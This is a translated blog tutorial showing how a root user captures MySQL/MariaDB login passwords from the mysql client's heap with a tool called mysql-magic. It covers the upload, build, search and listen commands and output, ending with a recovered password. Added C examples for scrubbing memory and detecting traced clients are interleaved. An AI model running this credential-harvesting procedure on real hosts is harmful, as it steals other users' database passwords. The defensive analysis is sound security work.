Using mysql-magic to obtain MySQL account passwords
2024-09-05 06:53:07
Copyright notice: this article is the blogger's original work; reposting is welcome, but please cite the original link https://www.cnblogs.com/zerotrust/p/10846530.html
This article is for technical discussion and sharing only; use for illegal purposes is strictly prohibited.
There are many ways to obtain the MySQL database password once you have root; here we use one of them, mysql-magic.
The mysql client reads the password, writes it to some malloc'ed memory, and frees it; but just because a chunk was freed doesn't mean it will be used again, so to ensure that your programs do not keep sensitive information in memory you must overwrite the memory.
The main goal is to get the password passed through the tty, but sometimes it also gets the password passed on the command line (-pxxxxxx).
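To make the weakness described above concrete from the defender's side, here is an added C example; it is not part of the original post and not code from mysql-magic. A small fixed arena stands in for the client's heap (so no freed memory of the real allocator is touched, which would be undefined behaviour), a password is copied in and released once without scrubbing and once with a volatile-pointer overwrite, and a scan of the arena shows whether the string is still recoverable. The arena, the function names and the test secret are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy heap: a fixed arena stands in for malloc'ed chunks so the
 * residue can be inspected without reading freed memory from the real
 * allocator (which would be undefined behaviour). */
#define ARENA_SIZE 4096
static unsigned char arena[ARENA_SIZE];
static size_t arena_top = 0;

static void *arena_alloc(size_t n) {
    if (arena_top + n > ARENA_SIZE) return NULL;
    void *p = arena + arena_top;
    arena_top += n;
    return p;
}

/* The pattern the tool relies on: the chunk is released but its bytes stay. */
static void arena_free_plain(void *p, size_t n) {
    (void)p; (void)n;   /* nothing is overwritten */
}

/* Hardened release: overwrite through a volatile pointer so the compiler
 * cannot drop the store as a dead write before the free. explicit_bzero(3)
 * (glibc >= 2.25) or memset_s (C11 Annex K) do the same job where available. */
static void secure_memzero(void *p, size_t n) {
    volatile unsigned char *vp = (volatile unsigned char *)p;
    while (n--) *vp++ = 0;
}

static void arena_free_scrub(void *p, size_t n) {
    secure_memzero(p, n);
}

/* The check a heap-dump scanner automates: look for a known string in the
 * whole arena, including released chunks. Returns 1 if found. */
static int arena_contains(const char *needle) {
    size_t len = strlen(needle);
    if (len == 0 || len > ARENA_SIZE) return 0;
    for (size_t i = 0; i + len <= ARENA_SIZE; i++) {
        if (memcmp(arena + i, needle, len) == 0) return 1;
    }
    return 0;
}

static void arena_reset(void) {
    memset(arena, 0, ARENA_SIZE);
    arena_top = 0;
}

/* Simulate the client reading a password from the tty into a heap buffer,
 * using it, and releasing it. scrub selects the hardened path. */
static int login_and_release(const char *password, int scrub) {
    size_t n = strlen(password) + 1;
    char *buf = arena_alloc(n);
    if (!buf) return -1;
    memcpy(buf, password, n);   /* the password now lives in the heap */
    /* ... authenticate with buf ... */
    if (scrub) arena_free_scrub(buf, n);
    else       arena_free_plain(buf, n);
    return 0;
}

/* Returns 1 if the password is still recoverable from the heap after release,
 * 0 if it was scrubbed, -1 on allocation failure. */
int password_survives_release(const char *password, int scrub) {
    arena_reset();
    if (login_and_release(password, scrub) != 0) return -1;
    return arena_contains(password);
}

int main(void) {
    const char *pw = "niub666";   /* constructed test secret, same as in the walkthrough */
    printf("plain free : residue=%d\n", password_survives_release(pw, 0));
    printf("scrub free : residue=%d\n", password_survives_release(pw, 1));
    return 0;
}
```

A plain memset() immediately before free() is often removed by the optimiser because the buffer is never read again; the volatile write loop, explicit_bzero() or memset_s() are the forms that survive, which is why the arena scan comes back empty only on the scrub path.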
First set up the test environment; I am using CentOS 7 here.
[root@baoleiji ~]# uname -a
Linux baoleiji 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[root@baoleiji ~]#
- Install mariadb
[root@baoleiji ~]# yum -y install mariadb-server
[root@baoleiji ~]# yum -y install gcc
- Start the database and set a user password
作为依赖被升级:
mariadb-libs.x86_64 1:5.5.60-1.el7_5
完毕!
[root@baoleiji ~]# systemctl start mariadb
[root@baoleiji ~]# mysqladmin -u root password niub666
[root@baoleiji ~]# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
- The pentest environment is ready; upload the tool to the target machine
[banxia@banxia-pc 下载]$ scp -r ./mysql-magic root@192.168.2.3:~
- Enter the mysql-magic directory and compile
[root@baoleiji mysql-magic]# cd ~
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd mysql-magic/
[root@baoleiji mysql-magic]# make
- Search memory for the password and get its offset
[root@baoleiji mysql-magic]# ./
ignotum/ mysql-magic src/
[root@baoleiji mysql-magic]# ./mysql-magic -s
[19:40:48] executing mysql (/usr/bin/mysql) ...
[19:40:48] pid = 2764
[19:40:48] waiting syscall exit_group
[19:40:48] exit detected !!!
[19:40:48] getting heap info
[19:40:48] reading the heap ...
[19:40:48] password found
[19:40:48] offset list: 0x850
- Start listen mode
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:42:53] waiting for connections
After that, whenever someone logs in to the database, the password is captured.
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:59:26] waiting for connections
[19:59:26] new connection found
[19:59:26] looking for mysql processes
[19:59:26] getting heap address of pid 3066
[19:59:26] heap = 7f69a70d5000-7f69a7118000
[19:59:26] 274432 bytes read of 274432
[19:59:26] heap saved to /tmp/3066-7f69a70d5000-7f69a7118000.dump
[19:59:26] string at offset 0x850:
[19:59:26] finish
PS: Because of encoding issues the tool may not display the account and password; if nothing is shown, you can look in the /tmp directory.
[root@baoleiji mysql-magic]# strings /tmp/3000-7f09f89cd000-7f09f8a10000.dump
<charset5.5.60-MariaDB
<copyrig!
root
niub666
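Two things in the logs above are observable from the defender's side: the search mode waits on the exit_group syscall, which means the mysql client runs under a tracer (TracerPid in /proc/<pid>/status is non-zero while that lasts), and the listen mode writes heap images named <pid>-<start>-<end>.dump. The following C program is an added example, not code from the post or from mysql-magic: it parses TracerPid and Name from status text, recognises the dump-file naming, and optionally walks /proc on a Linux host. The sample status texts are constructed; pids 3066 and 2764 are taken from the log, the other values are made up. Whether the listen mode also attaches with ptrace is not visible in the post's output, so the TracerPid check is only guaranteed to fire for the search mode.

```c
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the TracerPid field from the text of /proc/<pid>/status.
 * Returns the tracing pid, 0 when no tracer is attached, -1 if the field is absent. */
long tracer_pid_from_status(const char *status_text) {
    const char *p = strstr(status_text, "TracerPid:");
    if (!p) return -1;
    p += strlen("TracerPid:");
    while (*p == ' ' || *p == '\t') p++;
    return strtol(p, NULL, 10);
}

/* Copy the Name: field (the process comm) into out. Returns 1 on success. */
int name_from_status(const char *status_text, char *out, size_t outlen) {
    const char *p = strstr(status_text, "Name:");
    if (!p) return 0;
    p += strlen("Name:");
    while (*p == ' ' || *p == '\t') p++;
    size_t i = 0;
    while (*p && *p != '\n' && i + 1 < outlen) out[i++] = *p++;
    out[i] = '\0';
    return 1;
}

/* A mysql client with a non-zero TracerPid is the state that "waiting syscall
 * exit_group" implies. Returns 1 when status_text describes it. */
int is_traced_mysql_client(const char *status_text) {
    char name[64];
    if (!name_from_status(status_text, name, sizeof name)) return 0;
    if (strcmp(name, "mysql") != 0) return 0;
    return tracer_pid_from_status(status_text) > 0;
}

/* Match the dump-file naming seen in the log: <pid>-<hexstart>-<hexend>.dump */
int looks_like_heap_dump_name(const char *name) {
    const char *p = name;
    if (!isdigit((unsigned char)*p)) return 0;
    while (isdigit((unsigned char)*p)) p++;
    if (*p++ != '-' || !isxdigit((unsigned char)*p)) return 0;
    while (isxdigit((unsigned char)*p)) p++;
    if (*p++ != '-' || !isxdigit((unsigned char)*p)) return 0;
    while (isxdigit((unsigned char)*p)) p++;
    return strcmp(p, ".dump") == 0;
}

/* Live pass over /proc (Linux only): prints each traced mysql client.
 * Returns the number found, or -1 when /proc cannot be opened. */
int scan_proc_for_traced_mysql(void) {
    DIR *d = opendir("/proc");
    if (!d) return -1;
    struct dirent *e;
    int hits = 0;
    char path[64], text[4096];
    while ((e = readdir(d)) != NULL) {
        if (!isdigit((unsigned char)e->d_name[0])) continue;
        snprintf(path, sizeof path, "/proc/%s/status", e->d_name);
        FILE *f = fopen(path, "r");
        if (!f) continue;
        size_t n = fread(text, 1, sizeof text - 1, f);
        fclose(f);
        text[n] = '\0';
        if (is_traced_mysql_client(text)) {
            printf("pid %s: mysql client traced by pid %ld\n",
                   e->d_name, tracer_pid_from_status(text));
            hits++;
        }
    }
    closedir(d);
    return hits;
}

/* Constructed sample status texts for offline use (pids 3066 and 2764 from the log). */
static const char SAMPLE_TRACED[] =
    "Name:\tmysql\nState:\tt (tracing stop)\nPid:\t3066\nPPid:\t2990\nTracerPid:\t2764\n";
static const char SAMPLE_CLEAN[] =
    "Name:\tmysql\nState:\tS (sleeping)\nPid:\t3070\nPPid:\t2990\nTracerPid:\t0\n";

int main(void) {
    printf("sample traced: %d\n", is_traced_mysql_client(SAMPLE_TRACED));
    printf("sample clean : %d\n", is_traced_mysql_client(SAMPLE_CLEAN));
    printf("dump name    : %d\n", looks_like_heap_dump_name("3066-7f69a70d5000-7f69a7118000.dump"));
    int n = scan_proc_for_traced_mysql();
    if (n >= 0) printf("live scan: %d traced mysql client(s)\n", n);
    return 0;
}
```

Run periodically or from a file-integrity watch on the dump directory, the two checks give a host-level signal that complements the mitigation of scrubbing the password buffer in the client itself.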
For security reasons I won't post a link to the software; if you need it for study, leave your email and I'll send it to you.